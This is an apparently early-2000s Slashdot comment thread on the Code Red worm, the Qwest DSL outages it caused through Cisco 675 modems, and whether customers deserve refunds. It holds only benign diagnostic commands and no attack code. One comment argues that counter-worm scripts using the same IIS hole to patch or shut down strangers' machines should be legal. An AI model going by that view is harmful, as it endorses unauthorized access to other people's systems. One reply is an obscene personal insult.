Note that win2k is listed. Still, Gibson's nutty..

Re:I hate to say it,

Windows 2000 has security features? Get outta here!

No problems here

[Legion303]

I didn't even notice the effects of Code Red other than irc servers being a bit slower to connect. Of course, I have the internal piece of shit Intel DSL router for Qwest, but I also paid attention to the news--I would have had just as few problems with a Cisco (in fact, the first thing I did after setting passwords when I *did* have one was to change the http port and then disable it anyway). Qwest usually sucks, but the DSL service in Denver has been great so far.

-Legion

Microsoft software...?

[Phroggy]

The attack exploited a known vulnerability in certain Microsoft software that some Cisco products were running. Other Cisco products also were vulnerable due to unexpected side effects.

Since when do Cisco products run Microsoft software?

I think a journalist is confused...

Code Red affects Microsoft Windows systems running IIS, and I believe the exploit used also crashes some Cisco 67x DSL routers with old firmware. Cisco won't provide firmware patches because Cisco doesn't sell 67x routers to consumers directly, and Qwest won't provide firmware patches because Qwest doesn't care.

Re:Microsoft software...?

[fluke78]

Actually, there are several products that DO use IIS. The Cisco Call Manager for IP phones, and the IPTV content manager run IIS on NT 4.0. There are a few others but these are the notable ones.

Lost business

[SilentChris]

Actually, I'm still being bombarded by packets (I'm on a cable modem) from recent worms and I've considered dropping my provider/changing it.

It isn't "five bucks" for a loss of downtime. Most connections alone run between $30-50 in the DSL/Cable range a month, so 10 days, or 1/3 of that, is a loss of at least $10. Add to that work that cannot be completed over the internet, and the downtime can become severe.

Also, I don't think this situation is helping my provider, @Home, stay in the business any longer. If they can't start blocking these packets they're going to lose subscribers, which is the very last thing they should be doing right now.

Re:Lost business

[jedrek]

Wow. It's not $5, it's $10! Oh. My. God. It's still less than a night out on the town, no matter how small your town is.

jedrek

Re:Lost business

[SilentChris]

No, it's more like $10 plus any lost revenues I can't receive from failing to complete my work over the Internet. There's opportunity costs involved.

Re:Lost business

[ethereal]

I'm not sure how much luck you'll have suing your ISP over lost work, though - they'll probably say that you should have paid for @work rather than @home, or whatever their business-centric product is.

Qwest really was to blame.

[Brett+Glass]

I helped quite a few Qwest customers get back online after the worm knocked them off the Net repeatedly, so I can speak with confidence about the cause of the problem. First, Qwest did not update the firmware in users' Cisco DSL modems to the latest version, which was more resistant to the worm. Second, it did not configure those modems to disable the Web interface, which is a serious security risk. Finally, when users' modems began to fail, Qwest did not supply complete information on how to fix the problem for several days... and when it finally did update the information, many users with crashing modems could not see it because it was on the Web! Cisco shares a bit of the blame in that it produced the susceptible modems, but for the most part, the fault lies with Qwest, which believes that it does not have to care because it has a well-cemented monopoly in virtually all of its 14-state territory.

Re:Qwest really was to blame.

Mod the previous comment up.
I work for an ISP in Seattle. I personally configured "set web disabled" on every dsl modem on the network when the first report of problems with port 80 were announced on bugtraq, months before Code Red, and made sure all new customers had this configured. Still, these customers were experiencing the loss of service. Yet Qwest was telling our customers to just "set web disabled" and everything would be OK. What a complete lack of Q&A on the "fix" that Qwest stood by for almost three weeks. It took them until the 7th of September to publish the "set web port XXX" fix. If only one tech at Qwest had taken 5 minutes during those three weeks to test this they would have known (and should have published) that "set web disabled" was NOT a fix. Blame Code Red on whomever you will, but their is absolutely additional blame to be pointed at Qwest! Yes, customers are due some restitution for this.

Refunds for not providing internet access...

[MadAhab]

If they won't unblock the port, they should be prosecuted for fraud. If they are blocking ports, they are not offering internet access at all. They are offering "download access", but not Internet access, and you've been sold a false bill of goods.

It's important to note that Internet access is fundamentally, essentially, and always peer-to-peer. If you don't allow peer-to-peer access, you can call it "client-server" access or something else, but it's a lie to call it Internet access.

Anyone who wants to limit service in this way is incompetent to boot, since the Right Way to prevent abuse is not port blocking, but bandwidth capping. At a time when AT&T cable access is such a takeover target, it makes you wonder what the hell they are thinking.

Worse, by getting away with such a deceptive, unfair, and unnecessary abuse of their relationship with the customer, they are only paving the way to battle the Internet back into the traditional broadcast mode, where a few big companies have a voice, and individuals have none. I'm sure DisneyTimeWarnerNbcABCBSViaColumbialetric would love that, but you should hate that unless you also hate freedom. Like I said, if that's the service they want to offer, let them, but they can't claim that it's "Internet access" without ripping you off.

is this same qwest I have?

[CeramicNuts]

I certainly didn't get any calls or helpful advice from Qwest.

after puzzling over my dead connection, I tried the old reliable on-off-on trick. sure enough, I was online again. the first fix for the CodeRed attack I found here on slashdot! no help on Qwest's site, of course.

Qwest's DSL tech support is in fact worthless. if your connection goes down, and if you can sit on hold for 20 minutes, and if you can take the insult of your intelligence (is the modem plugged in? did you try a reboot?), they never give you an answer on why your DSL is down or when its coming back up. "everything looks ok on our end! it must be you!" swell, thanks. sometimes they even promise to "get right on it" if someone else in your area calls in with the same problem. to be fair their service is alright, just don't expect help when Things Go Wrong.

one of Qwest's talking heads was just on the news, explaining nobody will get a refund because it was "an external attack" and "the modem isn't our hardware". lol

Re:is this same qwest I have?

[steeef]

eh, it depends on who your call gets routed to. i just spent 3 days trying to get dsl back up at work. i talked to about 5 or 6 different tech support people, but the last guy (actually, the only guy. all the rest were women) actually sounded like he knew his shit. within 20 minutes of calling him, we had dsl back up and running. when i told my boss who i talked to, he said he remembered talking to him about a year ago, and how helpful he was then as well.

i've never had a great experience with any tech support calls, but there are usually helpful people on the other end. you just have to get lucky to find them.

Re:Did I miss something?

when i worked at RR Time Warner in Milwaukee we gave out 1 day, .5 day credits all the time, hell when we ran out of IP's adn people couldn't get logged on we gave out 3 month credits, just call and polietly, but firmly ask, don't be rude, or you won't get a dime, adn the nicer people were tome the more inclinded i was to give them a bigger credit.

Spammers like Qwest Re:Qwest are slime!

[strredwolf]

That's the same attutude when us non-Qwest users get spam from their downstreams. "What spammer?" while they nicely /dev/null the complaint.

This is what happened to me...

I've got DSL from Qwest in Portland, OR. When things went to hell I waited for two days before calling. Partially because my DSL goes down at least three times a week and the downtime can be anywhere from an hour to three or four. The main reason I didn't call right away was that I have never been on hold waiting for Qwest's customer service for less than 30 minutes.
I did call my ISP (not Qwest) in hopes that the problem was something simple on their end. They didn't know what was going on. They said that Qwest was getting hit by the Worm. Every one of their DSL customers in Portland were down.
When I did call or rather, tried to call, things just went to hell. The phone number for DSL customer support was disconnected. Thinking that the number had simply been changed since the last dreadful time I had to call them, I called the general support system and waded through until I got to a help system. It had two options: Option #1 was for people with Qwest as their ISP. Option #2 was for people with a different ISP. I chose Option #2 of course. After a few beeps, I was disconeccted.
I called and waded through the system once again a got the same result. Going back, I chose option #1 and was put on hold for 15 minutes before being disconnected.
I'm stupid so I did it again and waited on option #1 for over an hour.
When I finally was able to speak to a human I explained that I didn't want to start a trouble ticket, I just wanted information. Namely, what was going on and when they thought it would be fixed. The botbrain I was speaking with could not understand this simple request. He insisted that I had to start a trouble ticket. After going back and forth with this person for about ten minutes I asked to speak to his boss. After another ten minutes the boss gets on the line and tells me the same thing.
I could NOT get some simple information without starting a trouble ticket.
Well since all of my ISP's customers were down I was pretty sure that the problem was not on my system. I explained this to the boss and he just repeated the customer "support" mantra, "Do you want to start a trouble ticket?"

I know there are people that do not have problems with Qwest's DSL service. Some of them have posted here. I am not one of those people. I have never had a satisfactory "customer service transaction" with Qwest or US West.
If it were possible to get a cable modem I would. Not because there are fewer problems, but because it's cheaper. Unfortunately cable modem service stops a few blocks away.

I HATE monopolies.

Re:Want to Sue? Sue Microsoft!

[blamanj]

A lot of people will regard this as generic Microsoft bashing, but I think there's a least a grain of reasonableness in this suggestion. If you look at the product recalls that happen all the time in the non-virutal world (e.g., cars, baby strollers), you see that the producers of those products do bear some responsibility for their work.

So far, the software industry has managed to avoid much of that responsibility, but we are rapidly creating a world where people (and even lives) depend on it. As such, software manufactures should be held accountable when poor design or shoddy workmanship are rampant.

Brilliant idea

[mosch]

Think about what you're saying. Code red infects people by making requests to port 80. So they have a choice of buying a whole lot of expensive hardware and blocking all default.ida?XXX requests, violating the privacy of their users. This is what you're actually asking for.

The second option is that they can deny all incoming requests to port 80, since the UA forbids running servers anyway, and slowly wait for the code-red running machines to go away. This is what they did

I don't want "proactive measure" anywhere near my net connection. You do realize that a proactive measure would have to monitor all your traffic in depth, and then try to guess when you're behaviour was dangerous. When it has a false alarm, then you'd blame @Home for using such an error prone method, instead of a simple reactive method.

The trouble with listening to an idiot is that you might give them what they asked for.

Re:Brilliant idea

[pongo000]

The second option is that they can deny all incoming requests to port 80, since the UA forbids running servers anyway, and slowly wait for the
code-red running machines to go away. This is what they did

Not in Dallas, they didn't.

I'm not advocating any kind of port 80 blocking. It would be a trivial matter to simply block the offenders at their gateway. All @home has to do is set up a monitor on their IP block. This is proactive, but there's no need to monitor traffic in depth, as you say: The morons announce themselves.

Re:Brilliant idea

[fishbowl]

>The second option is that they can deny all
>incoming requests to port 80, since the UA
>forbids running servers anyway

You are mistaken, and you have NOT researched
the facts before posting this.

*MY* agreement with Qwest expressly allows
running servers. They are quite up-front and
honest about the whole thing. It's what makes
their relatively expensive, but somewhat slower,
service an attractive choice in markets where
there's cable or other dsl providers.

They even offered to help me setup my LAN, my linux boxes, a static IP netblock, you name it.

I would suggest that when you talk trash, you
stick to subjects that you know something about.

Re:Brilliant idea

[Rendus]

And I suggest that you read the posts you're replying to before spouting off.

Especially the part about [b]@Home[b], which the parent post was about.

Re:Brilliant idea

Jesus fuck, you're a dickhead. Why don't you shut your worthless little mouth? Since you're obviously incapable of understanding the simplest post without the meaning being rammed down your cum-gulping throat, try this:

READ -> COMPREHEND -> POST

Now fuck off, you tiny-dicked moron.

Re:Brilliant idea

[mosch]

You are mistaken, you did not read my post.

I was talking about @home, not qwest.

Re:Brilliant idea

[kawika]

Whoa! You're assuming a solution that wasn't specified by the original poster. He said:

I think asking for a refund is silly, but OTOH I think @home and other ISP's should be taking proactive measures to actively block the legions of fools who have no idea they've been rooted.

This could be done--and is done, I just talked to an @Home rep yesterday--by turning off service to customers that their logs indicate are probing other customer's port 80, which is BTW prohibited by the service agreement. They have to call in to get their service restored.

Re:Brilliant idea

[WNight]

How is routing packets based on the destination IP, which involves lookin in the packet, any different than routing based on the TCP level, such as transparent web proxies?

And then, what's wrong with routing a packet containing default.ida?... into /dev/null? Either it's a worm, and the customer didn't intend to send it, or it's a cracker, who you don't want using the service.

I think all ISPs should have dropped packets on port 80 that appeared to be CodeRed. It'd have stopped this thing quickly.

But then I think the Anti-CodeRed scripts that use the same hole, but to apply the patch or shutdown IIS and display a message explaining it, should have been used, and should be legal.

Attempted analogy. I shouldn't go into your car, even if unlocked. But, if your car was rolling slowly down the hill towards mine, would it be wrong if I opened the door and set the parking brake, to save both of us a large repair bill? Especially if I left you a nice note explaining the parking break, how to set/unset it, and why I did what I did.

In fact, in some jurisdictions, you'd be held responsible for not preventing an accident if you could have safely/easily done so, regardless of it being your "fault" to being with.

AT&T too

THis is slightly off topic, but does anyone know if AT&T is still restricting port 80 for home users? I'm trying to Http some pics out to my folks and they can't access em.

Re:AT&T too

[Swaffs]

I believe they are, but I don't know for fact.

report to washington public utilities commission

assuming your in washington state of course.
i reported an ISP to the BBB once, and they
never responded. go to http://www.wutc.wa.gov/
and click on the complaint form. i spent 6 months
getting a charge for $215 taken off my bill for a dsl modem i sent back last december. i just got the charge removed 2 weeks ago. i think the complaint helped. if your not in washington state try to find the public utilities commission for your state and complain to them

Canadian ISPs

[Swaffs]

I really have to wonder why this code red thing is such a problem in the US, but seemingly not so much in Canada. Now, its pretty well known that up here we get great service for a great price, and I believe that more Canadians are hooked to high-speed access than any other country (per capita of course).

Sure, I see a handful of hits an hour from it in my logs, but I haven't had any degredation of the network, no port 80 being shut off, no outtages. My cousin is also on cable in a different part of the country, and although he's had a lot more hits and maybe even some degredation, he also hasn't had any outtages or ports shut off.

So what gives? I'd like to joke that Canadians are smarter and more of our users have patched their systems, and so its not propagating across our networks as much, but I don't think that can actually be true. So what's the reason then?

P.S. Can anyone report on the situation in Southern Ontario? I have a theory up my sleeve...

Re:Canadian ISPs

[WildBeast]

It's true, I didn't feel it at all, i thought that Code Red was over hyped or something but apparently it hit pretty hard in the U.S.

Re:Canadian ISPs

[Swaffs]

Just out of curiosity, what part of the country are you in?

Re:Canadian ISPs

[mysticalreaper]

Well you know how Qwest (i think) and others had vounerable Cisco routers? And then because of that routers would go down, and service would go down as well. So in order to prevent this they would just kill all port 80 traffic, and there's your solution. Of course, this is only a good solution if it's temporary, and you fix your routers.

However, i could belive that we're running different routing equipment that was not compromised by Code Red. Perhaps our networks are less busy (or faster) as well, and that alleviated congestion. And due to better network equipment and conditions means we're not hit the same.

Re:Canadian ISPs

[h0tb0x]

Southern Ontario as I know it wasn't hit that badly. The Cable ISP I work for (which shall remain nameless) had maybe 200 - 300 infected out of 80,000. I say those numbers were pretty good. They were mostly snuffed out in a few days. We just dropped their modems and waited for them to call in and help them remove it. No filtering was really needed because it didn't each much bandwidth. As of right now my modem light still blinks for the arp requests but it has diminished quite a bit from the frenzy it was in for the first couple of days.

Re:Canadian ISPs

[WildBeast]

Montreal, Quebec

refund for what ?

[Archfeld]

An uncontrollable net storm caused by a virus, or an idiot admins' decision to block port 80 on a whole segment vs pushing individual machines off
as they were identified as infected. If you are looking for a refund for the FIRST you should sit down and be quiet, IF you are looking for a refund for the SECOND then I APPLAUD your efforts.

Re:refund for what ?

[Chris+Hind]

Your post translates into English as follows:

A service I have paid for not working for 10 days, or a service I have paid for not working for 10 days. If you are looking for a refund for the FIRST you should sit down and be quiet, IF you are looking for a refund for the SECOND then I APPLAUD your efforts.

Why the fuck should Qwest's customers bother about what caused the outage?

People are just stupid

This whole thing is stupid. When the worm was spreading rapidly, it seems that not many people were getting pissed at MS for the bug, but people who FAILED to patch their servers. Its like trying to sue MS because I used outlook to open an email attachment that wiped out my computer. Its the users responsibility to update their hardware (firmware in this case), the routers come with manuals as well. So lets all bitch at Qwest because we are too stupid to read a manual!

Refund?

[WildBeast]

Yeah the customers will get their $5 refund while the lawyer gets his millions. Sweet isn't it.

If i had any mod points

[Archfeld]

I'd give them to ya.
The parent makes several salient points about
a pssible internet model.

Re:If i had any mod points

If I had any I'd mod the grandparent down.

Refunds to people who do not agree to MS's licence

[pantherace]

If someone uses MS on a computer, in their EULA, MS has no liability (based on a contract, so if there is a law about it the law supercedes that.) Which basically means people who use windows can't do anything to microsoft. However, we have a (horrible in most situations) nice little law about cybercrime. It refers to 'hacking' (morons). And attempting to breach security.

Could Microsoft be sued for being an accessory to the breaking of computer security, and possibly false advertising (I remember secure being used in several advertisments for windows 2000 and nt)

Just my rambling

Astound/Seren has a 24 hour

[Archfeld]

period limit. They will deduct the cost of any outage over 24 hours, otherwise you just stomach it.

subscription software = fewer holes??

[altair1]

The irony is that this will probably end up just pushing subscription software.

What does subscription software have to do with Qwest's infrastructure getting hammered by Code Red? Does paying for software more frequently somehow result in fewer bugs?

IIS security fixes were available long after Code Red was still romping around, and at no cost to the users at all.

Re:why not? NOT! it's "Who!"

[Coolfish]

The question shouldn't be "why not" it should be "who".

Whose responsible for the lax security in the #1 email client?

Who lets the idiot users that use their idiot software run attachments?

I'll give ya a hint. They have plenty o' cash, and his name is Bill. Last name Gates. Works for Microsoft. In Redmond, Washington. He's friggen rich, dumbass! Sue that guy! now your damn ISP which is gonna go out of business anyway! Good grief!

OMG you could just substitute PAC-BELL

[Archfeld]

for QWEST and EVERYONE of your statements would still be true. The ONLY thing PAC-BELL has going for them is DSL is a relatively stable, or it would be beyond them to handle at all.

Nice and unbiased

[Ryvar]

Perhaps CmdrTaco would feel a bit differently if he was the one spending 16 hours a day on the phone every day for 14 days straight listening to that elevator music from Hell while overworked and scatterbrained qwest.net employees accidentally canceled his entire account three times just because he wanted to switch off a DMT line so that his Cisco 675 would work - what should have been a 24 hour interruption-free and painless operation. Perhaps he'd be outright enraged if this was in some way, shape, or form, critical to, say, slashdot's smooth functioning (analogy, obviously).

--Ryvar

The flip side....

[Flavius+Stilicho]

Asking for refunds is a bad idea for another reason, especially if this were to go to court and the plaintiffs were to win... it would just be another reason for the losers who create these worms to keep creating them. I can see it now: "d00dZ! Not only can we strike at M$ but we can get all these lame ass ISPs in trouble too!"
No thanks.

DID they takew reasonable precautions ?

[Archfeld]

Did they provide reasonable protection for their customers ? I think they screwed the pooch badly,
and are looking for anyway to blame someone, anyone else. There were very simple steps to remove ANY machine that was infected, rather than DO THE JOB they were getting PAYED FOR, they will blame someone else. If you offer a network, your clients have a right to assume YOU KNOW HOW TO RUN IT.

Refunds? Why?!

[kgasso]

Wow.. now isn't this interesting. Qwest actually started CALLING our QwestDSL customers to let them know of the problem, and detailing how to fix it, even walking them through this on the phone. Now, as if this wasn't enough, whenever you call the QwestDSL support number you get a long (5-6 minute) recorded message detailing, IN FULL, how to fix the problem. My only complaint is having to listen to it to get through to a real tech (and watching them disconnect a customer's service for 2 weeks to bump his speed down to 256k)... but this is ridiculous.

Qwest was doing the Right Thing here by being proactive and calling customers, but since they're the big bad telco, this is all their fault anyway. Do you honestly think Qwest is going to get any reimbursement from Cisco for all the support this problem has caused? I highly doubt it.

"Oh, excuse me Mr. Governor, but while driving on one of your state highways, my faulty tire blew out.. I demand you pay me for having it fixed and an extra chunk of money for my invaluable time!"

Pathetic.

what about CIHost ?

[beanerspace]

Gee, makes me wonder about CIHost's 99% guaranteed up time. Code Red knocked them loopy for over a week.

Business operations relying on xDSL connection?

[jroysdon]

Anyone stupid enough to base their business on xDSL without some form of backup needs to just suck it up when access is down. xDSL is not meant for reliable connectivity (even most ISPs say so, I know PBI does). If you want that, pay the price and get a fractional or full T1. Hell, if you're doing hosting off of an xDSL line that is going to lose you money if it goes down, co-locate it. If you're just complaining because your internal users couldn't get outside access, have backup ISDN if nothing else.

US$5K worth of business lost? Get real. If it cost you that much money, spend some proactively to be prepared. What if your xDSL modem fried and you couldn't get a replacement ASAP? I recall when I got my ADSL that it had statements stating that they wouldn't be held liable for any revenue lost, etc., from loss of service. Qwest has something simular:

Actual speeds you experience may vary due to line or weather conditions or other factors out of the control of Qwest

Code Red would fit "other factors out of the control of Qwest."

Re:Business operations relying on xDSL connection?

QWEST *marketed* DSL as a business solution. It was originally called MegaBit Services in 1998. You were also required at that time to run IIS with NT because they refused to turn it up unless it had those (to run their client / config stuff)

I have no patience for people in this thread talking without experience with QWEST / DSL. They marketed this to small / home business, at least in the Seattle market (where the users are from that are suing).

all hype

This is just people wanting somethign for nothing. I use Qwest dsl and run several servers off it. My debian box received 599 code red 1/2 hits over the period of 30+ days, which averages about 3kilobytes every hour. I dont' recall my connection going down more than a few minutes once -- and that's normal every month or two.

Qwest shouldn't be held responsible for morons who use unpatched IIS.

The Cisco bug doesn't explain the outage

[dark+druid]

I have DSL service from QWest in the Seattle area and lost service for about 24 hours during this outage. The problem most certainly was not Code Red on the DSL modem. Before this announcement I had killed the web server on the modem and upgraded the firmware. During the outage I must have power cycled the modem a dozen times vainly hoping it would work and I could check my e-mail. When I called QWest tech support in the afternoon they told me that the service was down for a few hours for "Server Upgrades" to deal with Code Red. I tried calling back later that night and spend an hour and a half on hold before giving up. I think QWest screwed up on the back end and used the Code Red attack on the Cisco modems as a convenient excuse. Simply unplugging waiting a few seconds and then plugging it back in would fix (until the next attack) any Cisco 675 modem.

Actually

[bwulf]

.. according to Cisco, there are several products that use IIS in one form or another, though from that list I don't see anything that should be running on public, non-firewalled IPs.

"it" happens

[hyrdra]

That's stupid to give refunds. It's not a network comapnies job to insure stupid users don't attack each other and bring down the network in the process. This is about liability -- you are ultimatly responsible for what your computer does. What do these people want a refund from? Their own foolishness?

In some cases, there may be those whom had never actually had the bug, and had experienced a network outage because of the "other people.". This happens. Quest cannot control the weather from destorying a router station just as much as it can't control a virus. Downtimes are a fact of life, a network is dynamic. Shit happens.

Avoid blaming at all, but at least when you need to, put blame where blame is deserved -- the Code Red virus. Don't sue the messenger.

Re:"it" happens

Dude... RTFA... This is about their own equipment failure....

Re:"it" happens

[hyrdra]

I DID read the fscking article. The article never mentions an equipment failure related to negligence, it mentions they got hit heavily by Code Red. This isn't a service level default of the contract or about the network not meating performance specifications and thus not being able to handle Code Red. It happened to other networks as well.

Which is why I assume you posted as Anonymous Coward?

Why should they give credit?

[h0tb0x]

I'm sorry to rant a bit but I work for a broadband ISP and I was a customer of that ISP for years previous to my employment there so I really am not being biased.
The code red worm has nothing to do with qwest.
QWest did not author the worm nor did they release it to the public in the first place.
The majority of the traffic caused by the worm was ARP traffic which uses minimal bandwidth, perhaps 3 - 9 kbps (more likely 3). Secondly most broadband ISP's or even DSL likely include a clause pertaining to running servers on a residential connection meaning "we do not permit you to use a server on the modem" so for those who were infected they were likely already in breach of the user agreement anyhow. If QWest went to the trouble of informing those who were infected and helping them recover then I would consider that excellent service. As someone in another post said "I could understand if there was a storm and the connection went down for a couple of hours" how is this much different? Probably 75% of the code red infected machines were being run by people who are morons and shouldn't have been running IIS in the first place. A real sys admin would have had it patched before or would have recovered quickly and with a patched system. This has nothing to do with any ISP's ask the idiots who ran infectable and poorly maintained machines for your money back!

Slashdot has been a little flaky lately

[CptnKirk]

maybe we should all whine for a little karma. :)

Re:in summary

[evil_spork]

geqgnegjeko ega;oighw fnawoihgohif faebluie kvbeihbfiwehbfiwehfo; agohweogihwe bfwehbfwebhf;owehf jehwgf;owehfin jn feabf nejbfoq; kbfwoqbfqw kfbqnfbi f enbfubqn fwqfoiwh

Freeway Guardrail Ping-Pong - An Analogy

[BigBlockMopar]

Quoting from article:

Steve Larsen, who heads the attorney general's new Cyber consumer resource center, said in a message to Mangus: "It seems reasonable that a customer should not have to pay for service they can't get. If you can't watch your cable TV or your newspaper doesn't show up for days/weeks at a time, I assume you won't pay. I believe that is all your customers ask here regardless of fault."

Scenario. Some idiot is driving a poorly-maintained car which was ill-conceived at the design stage. Maybe he didn't even know he was driving...

A wheel breaks off and his car plays Guardrail Ping-Pong on the turnpike.

The ensuing traffic jam shuts down the city's busiest artery, halting all commerce in the city. Your newspaper doesn't arrive as a result.

Multiply that by many, many cars at the same time.

Why don't we go after the bigger problem and charge the jackasses who designed perpetually failure-prone cars and the jackass owners who don't maintain them?

Going after them instead of the local highway contractor seems like a better idea to me.

Especially since these drivers have no excuse for not knowing how dangerous their flawed little cars are.

Re:Freeway Guardrail Ping-Pong - An Analogy

[alexburke]

A wheel breaks off [...] The ensuing traffic jam shuts down the city's busiest artery, halting all commerce in the city.

Oh c'mon, Lawrence. It was a tractor-trailer whose wheel broke off, and it was the 401. Anyone could'a guessed THAT... ;)

Re:Did I miss something?

[eram]

Also, the article talks about "Microsoft software" that some Cisco devices where using. What software was that? IIS runs embedded in Cisco stuff now?

I'm afraid that seems to be the case. Just look at this Cisco security advisory:

"The following Cisco products are vulnerable because they run affected versions of Microsoft IIS:

• Cisco CallManager
• Cisco Unity Server
• Cisco uOne
• Cisco ICS7750
• Cisco Building Broadband Service Manager
• IP/VC 3540 Application Server"

More Qwest Troubles Today

[VB]

At 16:05 MST, Qwest (Phoenix) started having some routing problems. 80-90% packet loss to all destinations until 21:05 MST. I have this data because my Slackware Alpha runs this home-rolled MRTG monitoring application. It wasn't a complete disruption of service. After 10 or 15 minutes the password prompt for an ssh request would appear from a remote ssh server. Occasionally you'd receive bits of a web page, and other times you'd get a "connection timed-out" in Linux Netscape 4.7x, or in IE: "couldn't find site, dns problem or server error" message. IE error messages are so incredibly unuseful in situations like these where you need information about why you can't reach a site, not just Micro$oft's packaged 40x client-side dll. Anyone know why they do that anyway? I can't see any reason why your browser should override the server's error message. BTW, you can disable this through options. WRT the "cannot connect to host" error, why would it say DNS server issue when the status bar shows the ip of the server you're trying connect to? Should say: can't establish a session with the server and not spew dns problem messages. Obfuscation. Probably FUD.

Actually, I don't know that we'll ever learn why Qwest had issues today, but the segment of the Qwest network affected did have a fairly pronounced Code Red II infestation. About 2/3rds of the infections reported at this Code Red report are from a monitor on the Phoenix Qwest DSL network. I can only suspect that the disruption was the result of having all those compromised hosts with root.exe running on them undetected.

With:

• tcpdump -i eth0 host not myhost.my.lan and not arp
  
• while true; do ping myexternalserver.com -c 100; sleep 1; echo; done
  
• cat tmp.txt | while read a; do traceroute $a; done
  
• iptraf -i -q
  

running on separate Eterms for the day, I've learned that Qwest shut down the router from the Phoenix DSL network a couple times and brought it back up only to find the behavior was the same. After some (infered) head-scratching after a period where they turned the router off for about 35 minutes, I saw a new hop beyond loop1.phnx-dsl-gw8.phnx.uswest.net but then dropped. This new router (not putting it out here since I'll leave that forensic recon to any potentially involved individuals in this outtage who are interested) had a new IP. No further hops for about 20 minutes (configuring this new router with new routes?). And, then it popped. All ETerms started showing smooth flow of traffic.

Perhaps a fairy tale inspired by a consultant who just lost a billable day. Perhaps a clue to solving a riddle that probably affected anyone on the Qwest Phoenix DSL network today. Potentially, a clue as to what people out there are doing with infected IIS machines.

If these conjectures have any modicum of merit; we're in trouble. Serius trouble.

Of course, this could all be my own imagination and the outtage the result of a backhoe operator on a Cottonwood corn farm.

You be the judge. If you're using Qwest DSL in Phoenix, this probably happened to you also.

service-pack != security-fix

[rm3friskerFTN]

When you say a "security-fix" do you really mean a "security-fix" all by itself or do you mean a SERVICE PACK that might have several "security-fixes" in it PLUS a whole bunch of stuff:

you don't want

you don't need

you know from years of clueful experience will cause harm to your particular system?

PAUSE ... PAUSE ... PAUSE

(security-fix == security-fix)
If you mean a "security-fix" all by itself that is just and only a "security-fix" then I am with you brother ... 133%!!!!!

(service-pack != security-fix)
If you mean a "security-patch" that is bundled with (is this the "no cost" part???):

a slew of other upgrades

modifications they will not tell you about

bug fixes

headaches

more holes

more bugs

expensive hardware upgrades that didn't need to be done but I had to do anyway due to this poorly designed SERVICE PACK

... then I am going to quite willfully turn around and BLAME THE VENDOR OF THE OS for creating an environment where it is safer and less expensive not to implement the "security-fix" because the OS/software vendor never offered a "no-cost" security-fix in the first place.

What they mostly offer is never "just a security-fix all by itself"

Wrong target

[Vapula]

These peçple should attack Microsoft instead... Especially if they are NOT using Microsoft products.

When you buy Microsoft products, the EULA says that Microsoft is not liable to any damage done to you...

But if you are using let's say, FreeBSD (or Linux, or Solaris,...), you never agreed with Microsoft Eula. So, Microsoft products DID HARM YOU via this Code Red Worm thing and you ARE NOT BOUND to Microsoft Eula... Microsoft clauses telling hey are not liable to any damage done to you don't apply in that case...

In the worst case, Microsoft could forward the complain to its users... But that would be a very unpopular move... "Use Microsoft products and you could be sued by non-Microsoft users because of the flaws in Microsoft products and can't attack Microsoft because of the Eula"...

Could be interresting ;-)

EXACTLY [aka - Why no lawsuits?]

[rm3friskerFTN]

QUESTION: If Joe/Jane Consumer, running whatever OS/Apps currently exist, has suffered as a result of the Microsoft Code Red I & II Worm can he/she sue Microsoft for losses???

IMPORTANT NOTE: Joe/Jane Consumer did NOT sign/accept/whatever an EULA associated with Microsoft Web Server (e.g. IIS). Joe/Jane was just "harmed" by the poorly designed, fault ridden, Microsoft Server Software. Joe/Jane NEVER signed/accepted/whatever the EULA associated with the poorly designed, fault ridden Microsoft Server Software.

Sheesh!

My home DSL server has been hit 2,347 times since the first of the month. My primary server has been hit now ~ 15,000 (and climbing)

At the worst, Code Red was hitting my main server several times per minute!

Compared to the base traffic, not really all that much (I have three OC3 network feeds ath the colo) but still nothing to sneeze at...

-Ben

ON TARGET [Re:Where are the tobacco lawyers?]

[rm3friskerFTN]

Say Joe/Jane Consumer, running whatever OS/Apps currently exist, suffered as a result of the Microsoft Code Red I & II Worm.

Furthermore, Joe/Jane Consumer did NOT sign/accept/whatever an EULA associated with Microsoft Web Server (e.g. IIS), they only accepted the license agreement for Win95.

Joe/Jane was just "harmed" by the poorly designed, fault ridden, Microsoft Server Software.

Again, Joe/Jane NEVER signed/accepted/whatever the EULA associated with Microsoft Server Software (IIS). can he/she sue Microsoft for losses???

IMPORTANT NOTE:

Re:Want to Sue? Sue Microsoft!

[rm3friskerFTN]

An argument is set forth here.

The key, I believe is that the injured party must not have accepted the EULA for the Microsoft SERVER software (IIS).

EXAMPLE
An injured party runs a small consulting outfit out of their bedroom. They were unable to reach customers/clients via email due to the network traffic jam caused by the Microsoft Code Red Worm I & II.

The injured party was unable to submit the bid for contract to Big Company, Inc.

Code Red and Cisco 675

[Alex+Belits]

My provider isn't "The Wicked Q of the West", but I ended up downloading Cisco 675 CBOS upgrade from their site. This is what happened.

1. I have received announcements about Code Red in everything security-related that I was subscribed to, and as usual, ignored it because I don't use IIS, Windows and other garbage of that kind.

2. Cisco 675 router that connects me to my providers (ISP is Megapath, line was Rhythms) started hanging in the most outrageous manner possible, being not accessible even from its serial console that I have attached to one of my Linux boxes through USB multiport serial converter. It was "outrageous" and not merely "bad" because same Linux box happened to have still-working Ricochet modem attached to another USB port, and I was able to reach it from work even when DSL was down, but couldn't reset DSL until I was physically at home.

3. Later announcements mentioned Cisco routers as vulnerability, and recommended to disable web administration on the router as a workaround, and upgrade the firmware. Cisco page mentioned an upgrade but did not offer anything to download -- required to call their phone number or email them and beg for firmware update. Knowing that everybody who ever bought Cisco 6xx, plus a bunch of people who didn't know how their company's Catalyst differs from bitty box 675, will be trying to reach Cisco, I have chosen to do a workaround.

4. I have disabled web administration, it stopped working, but router continued listening on the port 80. I assumed, it will just ignore all data that it receives, so a bug won't be triggered.

5. Router still hangs. I have set a filter to block everything that comes from outside to the port 80 on the router. It looked like router stopped responding to this, so I was confident that I am not vulnerable to that thing anymore.

6. Router still hangs. Apparently my mind was not advanced enough to comprehend the brokenness of CBOS -- broken code was receiving packets BEFORE THEY PASSED THE FILTERS.

7. I have looked at the Cisco site to check if they got the idea, how many requests for copies of CBOS patches they are supposed to process and posted the binaries. Nothing -- the page still contained a phone number and email address, and since I was at home, I could be pretty sure that people who were supposed to answer at Cisco weren't at work either.

As opposed to other Cisco products, CBOS has no optional pieces, and is useful for a single puprose of upgrading shitty 6xx boxes, so why they needed my phone call to make sure that I am indeed going to use their software to upgrade their router and not, say, print as a hex dump and smoke it, is still a mystery for me.

